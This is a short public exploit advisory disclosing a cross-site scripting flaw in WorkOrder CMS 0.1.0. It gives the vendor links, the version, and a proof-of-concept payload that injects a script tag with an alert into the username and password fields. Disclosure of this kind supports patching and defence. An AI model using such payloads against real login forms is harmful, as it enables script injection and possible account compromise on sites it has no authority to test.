WorkOrder CMS version 0.1.0 suffers from a cross site scripting vulnerability.
8cb65551c6ae83267598a7e09fa1ae7d1fe89f8b73a899df384b74eda241039d# Exploit Title: WorkOrder CMS 0.1.0 Cross-Site Scripting (XSS)
# Date: Sep 22, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS
# Software Link:
https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip
# Version: 0.1.0
# Tested on: Linux
# Payload:
username:<u>test1337<script>alert('hi');</script>
password:<u>test1337<script>alert('hi');</script>